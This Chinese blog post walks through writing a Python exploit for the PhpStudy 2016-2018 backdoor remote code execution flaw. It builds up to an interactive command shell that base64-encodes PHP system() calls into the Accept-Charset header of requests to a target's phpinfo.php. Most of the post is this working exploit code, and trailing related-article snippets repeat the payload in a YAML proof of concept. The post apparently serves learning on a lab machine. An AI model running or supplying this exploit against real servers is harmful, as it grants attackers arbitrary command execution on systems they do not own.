针对PhpStudy-RCE漏洞EXP的编写(python)

最新推荐文章于 2024-07-26 10:02:51 发布
最新推荐文章于 2024-07-26 10:02:51 发布
阅读量311 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 安全 python vscode 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_78155155/article/details/131872139

PhpStudy-RCE漏洞

PhpStudy_2016-2018_RCE漏洞复现_L尘痕的博客-优快云博客

首先先看到编写的收手点

基础环境

python编写工具:vscode

运行脚本:cmd窗口(管理员身份运行)

ECP编写

1、模拟数据包的发送

# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close

import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url)
# 获取到GET请求
print(res.text)
# 对上述内容做输出

 2、输出的内容不简洁,需要再次修改

import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出

 3、这时EXP所达到的效果得到初步的实现,只需将ipconfig编码改变就可以实现,为了更方便的使用,我们需要将编码变成cmd


import requests
# 定义request请求
import base64
# 导入base64模块

url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
cmd = "system('whoami');"
# 定义输入的命令
cmd = base64.b64encode(cmd.encode())
# 以二进制的方式进行编码
headers = {
    "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    "Accept-Charset"    : cmd,
    "Accept-Encoding"   : "gzip,deflate"
}
# 定义具体需要的关键字段

res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出

 4、直接在cmd窗口输入命令


import requests
# 定义request请求
import base64
# 导入base64模块

url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
while True :
# 让以下程序做循环
    cmd = input("-->")
    # 不用在脚本中修改命令,直接在窗口输入,得到结果
    if cmd == 'q!' :
    # 如果输入q!则终止循环
        break
    # 跳出循环
    cmd = f"system('{cmd}');"
    # 定义输入的命令
    cmd = base64.b64encode(cmd.encode())
    # 以二进制的方式进行编码
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }
    # 定义具体需要的关键字段

    res = requests.get(url = url, headers = headers)
    # 获取到GET请求
    result = res.text[0:res.text.find("<!DOCTYPE html")]
    # 对整体做切片,以内容的头部明显字段做目标来达到效果
    print(result)
    # 对上述内容做输出

 5、对脚本进行美化,得到最终EXP

# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close

import requests
# 定义request请求
import base64
# 导入base64模块
import sys
# 导入sys模块
banner = '''
---------------------------------------------------------------------
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|p|h|p|s|t|u|d|y|2|0|1|6|r|c|e|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Usage: python *.py http://192.168.153.232/phpinfo.php
---------------------------------------------------------------------
'''
# 美化脚本并提示脚本的用法,当然也可以写入作者
if len(sys.argv) < 2 :
# 如果没有给脚本并给的参数不小于2
    print(banner)
# 则输出提示
    exit()
# 否则退出,不执行以下程序

url = sys.argv[1]
# 定义针对的目标
def attack(cmd) :
    cmd = f"system('{cmd}');"
    # 定义输入的命令
    cmd = base64.b64encode(cmd.encode())
    # 以二进制的方式进行编码
    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"
    }
    # 定义具体需要的关键字段

    res = requests.get(url = url, headers = headers)
    # 获取到GET请求
    result = res.content.decode("gb2312")
    # 以二进制的方式解码在输出成中文
    result = result[0:result.find("<!DOCTYPE html")]
    # 对整体做切片,以内容的头部明显字段做目标来达到效果
    return result
    # 对上述内容做输出

while True :
# 让以下程序做循环
    cmd = input("请输入命令 : ")
    # 不用在脚本中修改命令,直接在窗口输入,得到结果
    result = attack(cmd)
    # 返回result内容
    print(result)
    # 输出result内容
    if cmd == 'q!' :
    # 如果输入q!则终止循环
        break
    # 则跳出循环

 有问题可以随时进行探讨哦!!!

#认真走好每一小步  请多指教

@L尘痕

编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
weixin_43263566的博客
05-23 1297
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
phpstudy RCE脚本编写Python
m0_56578216的博客
09-21 410
如果想执行由用户输入的任意代码,就要用base64模块给命令做编码,并添加一个cmd变量,替换Accept-Charset的内容,下面以whoami为例:
Python安全编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1714
本例中以靶机DVWA中的盲注为例。
phpstudy后门dll文件命令执行漏洞复现
来到了学渣的博客
11-08 3090
一直安装了phpstudy这个玩意,但没想到这个集成工具还有后门漏洞,于是我一探究竟,环境启动 查了下资料,漏洞版本和路径主要如下 漏洞版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\
phpstudy漏洞
qq_17054659的博客
01-11 6610
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpstudy_2016_RCE 漏洞复现以及exp编写
oyqsb的博客
07-22 266
RCE(远程代码执行漏洞),可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。通常是由于服务器没有对执行的命令或代码做严格的过滤,最终导致攻击者上传的恶意命令或代码被执行。
漏洞复现】phpStudy 小皮 Windows面板 存在RCE漏洞
xt350488的博客
07-26 1050
如上图可以看到确实触发XSS弹窗,这是因为整个系统在加载的过程中会读取操作日志的内容,刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本,所以执行显示了登录系统失败。这个时候我们再去访问这个php木马,这个时候就可以直接使用【蚁剑】连接,连接就不演示了(图不小心删了)此时你会发现你访问了这个php, 自动下载了这个文件,并没有执行,说明是纯静态的网页,我们也就使用。这个时候我们去网站后台看php版本,没有选择,选择指定的版本并保存就好。此时再输入正确的密码,成功弹窗。
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现
kkkkk0826的专栏
10-13 755
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL 数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被...
Joomla-3.4.6远程代码执行漏洞复现
yi_jin_ke_tang的博客
02-15 1122
#01 Joomla简介 Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。 #02 漏洞简介 在exploit-db( https:...
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 1006
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的.
phpStudy_2016-2018_RCE漏洞的检测利用脚本编写
weixin_44801963的博客
09-25 610
文章目录前言一、phpStudy_2016-2018存在什么漏洞二、EXP脚本编写1.目标存活检测2.漏洞触发3.完整代码总结 前言 本章主要针对phpStudy_2016-2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。目前恶意植入该漏洞后门的犯罪者已伏法。 关于phpStudy_2016-2018_RCE 漏洞的详细介绍参考:https:// 一、phpStudy_2016-2018存在什么漏洞 phpStudy_2016-2018中存在RCE(remote.
PhpStudy2016-2018-RCE 漏洞复现
故事讲予风听
07-14 1635
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 716
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
复现PhpStudy2018漏洞复现&检测和执行POC脚本
qq_45031509的博客
07-17 1983
复现PhpStudy2018漏洞复现&检测和执行POC脚本
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1810
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
Python小练习】使用Python编写POC 脚本-上篇
慢就是快
09-13 739
Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为**漏洞验证程序,**类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 5637
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 6234
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
命令执行(RCE)面对各种过滤,骚姿势绕过总结
HUANGXIN9898的博客
07-09 3295
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
poc-yaml-phpstudy-backdoor-rce2018和2016的文件目录
最新发布
04-01
### PHPStudy 后门 RCE 漏洞 POC 及文件目录结构 #### 关于 PHPStudy 后门 RCE 的 POC PHPStudy 是一款集成开发环境工具,用于快速搭建本地 Web 开发环境。然而,在其某些版本中存在后门代码,可能导致远程代码执行(RCE)。以下是关于该漏洞的概念验证(POC)描述。 漏洞利用的核心在于 `\ext\php_xmlrpc.dll` 模块中的恶意代码[^2]。攻击者可以通过特定请求触发此模块的功能,从而实现任意命令执行。具体来说,通过设置 `Accept-Charset` 请求头为 Base64 编码后的恶意负载,并发送到目标服务器上的 `/index.php` 路径即可完成攻击。 以下是一个基于 YAML 格式的 POC 描述: ```yaml name: poc-yaml-phpstudy-backdoor-rce rules: - method: GET path: /index.php headers: Accept-Encoding: 'gzip,deflate' Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw== follow_redirects: false expression: | body.bcontains(b'a5952fb670b54572bcec7440a554633e') detail: author: 17bdw affected_version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" vuln_url: "php_xmlrpc.dll" links: - https://www.freebuf.com/column/214946.html ``` 上述 YAML 文件定义了一个简单的漏洞检测规则。其中,`Accept-Charset` 头部被设置为经过 Base64 编码的恶意负载,解码后的内容通常是一条系统命令或脚本调用语句。如果返回的结果包含预期的哈希值,则表明目标主机可能存在漏洞[^3]。 --- #### PHPStudy 2016 和 2018 版本的文件目录结构 对于 PHPStudy 2016 和 2018 的默认安装路径及其内部文件夹布局,可以参考以下说明: ##### **PHPStudy 2016** - 安装根目录:`C:\phpstudy_pro` - 配置文件位置:`\PHPTutorial\config\httpd.conf` - 默认网站根目录:`\WWW` - PHP 执行程序所在路径:`\Applications\php-5.4.45` - XML-RPC 动态链接库路径:`\ext\php_xmlrpc.dll` 当启动 PHPStudy 并运行内置浏览器时,默认会加载位于 `www/phpinfo.php` 下的信息页面来展示当前配置状态[^1]。 ##### **PHPStudy 2018** 尽管两个版本之间差异不大,但在细节上仍有一些调整: - 新增支持更多扩展功能和服务选项; - 继续沿用了类似的文件存储逻辑——即主要组件依旧集中存放在应用程序子目录下。 例如,同样可以在下面这些地方找到相关内容: - 主站点数据区:`D:\phpstudyPro\WWW`(取决于用户自定义设定)- CGI/FastCGI 接口关联部分则可能涉及到了额外的安全加固措施或者参数修改情况等等[^4]。 需要注意的是,由于官方已经停止维护旧版软件包并推荐升级至最新稳定发行系列产品线之中去继续享受技术支持服务保障体系所带来的便利之处的同时也能够有效规避潜在风险隐患问题的发生几率大大降低许多! --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

L尘痕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值